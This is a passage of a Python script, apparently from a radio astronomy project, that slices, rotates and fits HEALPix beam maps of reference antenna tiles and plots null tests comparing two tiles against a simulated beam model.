θ_EW, ɸ_EW = np.degrees(hp.pix2ang(nside, EW_indices))
zenith_angle_NS = []
for i, j in zip(θ_NS, ɸ_NS):
if j <= 180:
zenith_angle_NS.append(-1 * i)
else:
zenith_angle_NS.append(i)
zenith_angle_EW = []
for i, j in zip(θ_EW, ɸ_EW):
if j <= 180:
zenith_angle_EW.append(-1 * i)
else:
zenith_angle_EW.append(i)
NS_data = [hp_map[NS_indices], zenith_angle_NS]
EW_data = [hp_map[EW_indices], zenith_angle_EW]
return [NS_data, EW_data]
def nan_mad(ref_map):
"""Compute mad while ignoring nans"""
ref_map_mad = []
for j in ref_map:
if j != []:
j = np.asarray(j)
j = j[~np.isnan(j)]
ref_map_mad.append(mad(j))
else:
ref_map_mad.append(np.nan)
ref_map_mad = np.asarray(ref_map_mad)
ref_map_mad[np.where(ref_map_mad == np.nan)] = np.nanmean(ref_map_mad)
return ref_map_mad
def good_maps(ref_map):
"""Creates a ref map with only good satellites"""
pointings = ["0", "2", "4"]
# load data from map .npz file
f = Path(f"{map_dir}/{ref_map}")
tile_data = np.load(f, allow_pickle=True)
tile_data = {key: tile_data[key].item() for key in tile_data}
ref_map = tile_data["ref_map"]
# Good sats from which to make plots
good_sats = [
25338,
25984,
25985,
28654,
40086,
40087,
40091,
41179,
41180,
41182,
41183,
41184,
41185,
41187,
41188,
41189,
44387,
]
# Empty good map
good_map = [[] for pixel in range(hp.nside2npix(nside))]
for p in pointings:
# append to good map from all good sat data
for sat in good_sats:
for pix in range(hp.nside2npix(nside)):
good_map[pix].extend(ref_map[p][sat][pix])
return good_map
def ref_map_slice(good_map):
"""slices ref healpix map along NS & EW"""
ref_map_NS, ref_map_EW = slice_map(np.asarray(good_map))
ref_med_map_NS = np.asarray(
[(np.nanmedian(i) if i != [] else np.nan) for i in ref_map_NS[0]]
)
# Scale mean map such that the max value is 0
ref_med_map_scaled_NS = np.asarray(
[i - np.nanmax(ref_med_map_NS) for i in ref_med_map_NS]
)
# ref_mad_map_NS = np.asarray([mad(i) for i in ref_map_NS[0]])
ref_mad_map_NS = np.asarray(nan_mad(ref_map_NS[0]))
za_NS = ref_map_NS[1]
ref_med_map_EW = np.asarray(
[(np.nanmedian(i) if i != [] else np.nan) for i in ref_map_EW[0]]
)
# Scale mean map such that the max value is 0
ref_med_map_scaled_EW = np.asarray(
[i - np.nanmax(ref_med_map_EW) for i in ref_med_map_EW]
)
# ref_mad_map_EW = np.asarray([mad(i) for i in ref_map_EW[0]])
ref_mad_map_EW = np.asarray(nan_mad(ref_map_EW[0]))
za_EW = ref_map_EW[1]
NS_data = [ref_med_map_scaled_NS, ref_mad_map_NS, za_NS]
EW_data = [ref_med_map_scaled_EW, ref_mad_map_EW, za_EW]
return [NS_data, EW_data]
# rotate func written by <NAME>
def rotate(nside, angle=None, healpix_array=None, savetag=None, flip=False):
"""Takes in a healpix array, rotates it by the desired angle, and saves it.
Optionally flip the data, changes east-west into west-east because
astronomy"""
# theta phi values of each pixel
hp_indices = np.arange(hp.nside2npix(nside))
θ, ɸ = hp.pix2ang(nside, hp_indices)
new_hp_inds = hp.ang2pix(nside, θ, ɸ + angle)
##Flip the data to match astro conventions
if flip == True:
new_angles = []
for phi in ɸ:
if phi <= np.pi:
new_angles.append(np.pi - phi)
else:
new_angles.append(3 * np.pi - phi)
new_hp_inds = hp.ang2pix(nside, ɸ, np.asarray(new_angles))
##Save the array in the new order
if savetag:
np.savez_compressed(savetag, beammap=healpix_array[new_hp_inds])
return healpix_array[new_hp_inds]
# chisquared minimization to best fit map to data
def fit_gain(map_data=None, map_error=None, beam=None):
"""Fit the beam model to the measured data using
chisquared minimization"""
bad_values = np.isnan(map_data)
map_data = map_data[~bad_values]
map_error = map_error[~bad_values]
map_error[np.where(map_error == 0)] = np.mean(map_error)
def chisqfunc(gain):
model = beam[~bad_values] + gain
chisq = sum((map_data - model) ** 2)
# chisq = sum(((map_data - model)/map_error)**2)
return chisq
x0 = np.array([0])
result = opt.minimize(chisqfunc, x0)
return result.x
def poly_fit(x, y, map_data, order):
"""Fit polynominal of order to data"""
x = np.asarray(x)
y = np.asarray(y)
bad_values = np.isnan(map_data)
x_good = x[~bad_values]
y_good = y[~bad_values]
coefs = poly.polyfit(x_good, y_good, order)
fit = poly.polyval(x, coefs)
return fit
def plt_slice(
fig=None,
sub=(None, None, None),
zen_angle=None,
map_slice=None,
map_error=None,
model_slice=None,
delta_pow=None,
pow_fit=None,
slice_label=None,
model_label=None,
ylabel=True,
title=None,
):
"""Plot a slice of the beam, with measured
data, errorbars, and fit the simulated beam
to the data. Also plot the diff b/w data and
the model"""
ax = fig.add_subplot(sub[0], sub[1], sub[2])
ax.errorbar(
zen_angle,
map_slice,
yerr=map_error,
fmt=".",
color="#a8df65",
ecolor="#7da87b",
elinewidth=2.1,
capsize=2.1,
capthick=2.6,
alpha=0.9,
ms=7,
label=slice_label,
)
ax.plot(
zen_angle,
model_slice,
color="#c70039",
linewidth=2.1,
alpha=0.9,
label=model_label,
)
ax.text(0.02, 0.88, title, horizontalalignment="left", transform=ax.transAxes)
# ax.set_ylim(bottom=-30)
# ax.set_xlabel('Zenith Angle (degrees)')
# ax.legend(loc='lower center')
leg = ax.legend(loc="lower center", frameon=True, framealpha=0.3, handlelength=1)
leg.get_frame().set_facecolor("white")
for l in leg.legendHandles:
l.set_alpha(1)
for text in leg.get_texts():
plt.setp(text, color="w")
ax.set_xlim([-82, 82])
ax.set_ylim([-26, 12])
ax.set_xticklabels([])
divider = make_axes_locatable(ax)
dax = divider.append_axes("bottom", size="30%", pad=0.1)
# dax = fig.add_subplot(2,1,2)
dax.scatter(zen_angle, delta_pow, marker=".", s=42, color="#63b7af")
dax.plot(zen_angle, pow_fit, linewidth=2.1, alpha=0.9, color="#ff8264")
dax.set_xlim([-82, 82])
dax.set_xticklabels([])
dax.set_ylim([-5, 5])
if ylabel is True:
ax.set_ylabel("Power [dB]")
dax.set_ylabel(r"$\Delta$ref [dB]")
# dax.set_ylabel('Data - Model (dB)')
else:
dax.set_yticklabels([])
ax.set_yticklabels([])
return ax
def plt_null_test(
fig=None,
sub=(None, None, None),
zen_angle=None,
del_pow=None,
del_err=None,
del_beam=None,
del_fit=None,
null_label=None,
beam_label=None,
fit_label=None,
ylabel=True,
title=None,
):
"""Plot graphs for a null test"""
ax = fig.add_subplot(sub[0], sub[1], sub[2])
ax.errorbar(
zen_angle,
del_pow,
yerr=del_err,
fmt=".",
color="#a8df65",
ecolor="#7da87b",
elinewidth=2.1,
capsize=2.1,
capthick=2.6,
alpha=0.9,
ms=7,
label=null_label,
)
ax.text(0.02, 0.9, title, horizontalalignment="left", transform=ax.transAxes)
ax.plot(
zen_angle, del_beam, color="#c70039", linewidth=2.1, alpha=0.9, label=beam_label
)
ax.plot(
zen_angle, del_fit, color="#ff8264", linewidth=2.1, alpha=0.9, label=fit_label
)
ax.set_xlim([-82, 82])
ax.set_ylim([-10, 10])
ax.set_xlabel("Zenith Angle [degrees]")
# ax.legend(loc='upper left')
leg = ax.legend(loc="lower left", frameon=True, framealpha=0.3, handlelength=1)
leg.get_frame().set_facecolor("white")
for l in leg.legendHandles:
l.set_alpha(1)
for text in leg.get_texts():
plt.setp(text, color="w")
if ylabel is True:
ax.set_ylabel("Power [dB]")
else:
ax.set_yticklabels([])
return ax
if __name__ == "__main__":
import argparse
import numpy as np
from pathlib import Path
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.gridspec as gs
from mpl_toolkits.axes_grid1 import make_axes_locatable
from scipy.stats import median_absolute_deviation as mad
import sys
sys.path.append("../../decode_rf_data")
sys.path.append("../../tile_maps")
from plot_tile_maps import plot_healpix
from colormap import spectral
# Custom spectral colormap
cmap = spectral()
parser = argparse.ArgumentParser(
description="""
Plot healpix map of reference data
"""
)
parser.add_argument(
"--out_dir",
metavar="\b",
default="../../../outputs/tile_maps/null_test/",
help="Output directory. Default=../../../outputs/tile_maps/null_test/",
)
parser.add_argument(
"--map_dir",
metavar="\b",
default="../../../outputs/tile_maps/tile_maps_raw/",
help="Output directory. Default=../../../outputs/tile_maps/tile_maps_raw/",
)
parser.add_argument(
"--ref_model",
metavar="\b",
default="../../../outputs/reproject_ref/ref_dipole_models.npz",
help="Healpix reference FEE model file. default=../../../outputs/reproject_ref/ref_dipole_models.npz",
)
parser.add_argument(
"--nside",
metavar="\b",
type=int,
default=32,
help="Healpix Nside. Default = 32",
)
args = parser.parse_args()
out_dir = Path(args.out_dir)
map_dir = Path(args.map_dir)
ref_model = args.ref_model
nside = args.nside
out_dir.mkdir(parents=True, exist_ok=True)
ref_tiles = [
"S35XX_rf0XX_sat_maps.npz",
"S35YY_rf0YY_sat_maps.npz",
"S35XX_rf1XX_sat_maps.npz",
"S35YY_rf1YY_sat_maps.npz",
]
good_rf0XX = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[0])),
)
good_rf0YY = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[1])),
)
good_rf1XX = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[2])),
)
good_rf1YY = rotate(
nside,
angle=+(1 * np.pi) / 4.0,
healpix_array=np.asarray(good_maps(ref_tiles[3])),
)
# NS, EW slices of all four reference tiles
rf0XX_NS, rf0XX_EW = ref_map_slice(good_rf0XX)
rf0YY_NS, rf0YY_EW = ref_map_slice(good_rf0YY)
rf1XX_NS, rf1XX_EW = ref_map_slice(good_rf1XX)
rf1YY_NS, rf1YY_EW = ref_map_slice(good_rf1YY)
# Null test diff in power b/w rf0 & rf1
ref01_XX_NS = rf0XX_NS[0] - rf1XX_NS[0]
ref01_XX_EW = rf0XX_EW[0] - rf1XX_EW[0]
ref01_YY_NS = rf0YY_NS[0] - rf1YY_NS[0]
ref01_YY_EW = rf0YY_EW[0] - rf1YY_EW[0]
# Error propogation in null test
error_ref01_XX_NS = np.sqrt((rf0XX_NS[1]) ** 2 + (rf1XX_NS[1]) ** 2)
error_ref01_XX_EW = np.sqrt((rf0XX_EW[1]) ** 2 + (rf1XX_EW[1]) ** 2)
error_ref01_YY_NS = np.sqrt((rf0YY_NS[1]) ** 2 + (rf1YY_NS[1]) ** 2)
error_ref01_YY_EW = np.sqrt((rf0YY_EW[1]) ** 2 + (rf1YY_EW[1]) ** 2)
# Load reference FEE model
ref_fee_model = np.load(ref_model, allow_pickle=True)
beam_XX = ref_fee_model["XX"]
beam_YY = ref_fee_model["YY"]
# Rotate beam models by pi/4 to match rotation of data
rotated_XX = rotate(nside, angle=-(1 * np.pi) / 4.0, healpix_array=beam_XX)
rotated_YY = rotate(nside, angle=-(1 * np.pi) / 4.0, healpix_array=beam_YY)
# These plots show that the pi/4 rotation was correct
# plot_healpix(data_map=rotated_XX,sub=(1,1,1), cmap=cmap, vmin=-40, vmax=-20)
# plot_healpix(data_map=rotated_YY,sub=(1,1,1), cmap=cmap, vmin=-40, vmax=-20)
# plt.show()
# slice the XX rotated map along NS, EW
XX_NS, XX_EW = slice_map(rotated_XX)
XX_NS_slice, za_NS = XX_NS
XX_EW_slice, za_EW = XX_EW
# slice the |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.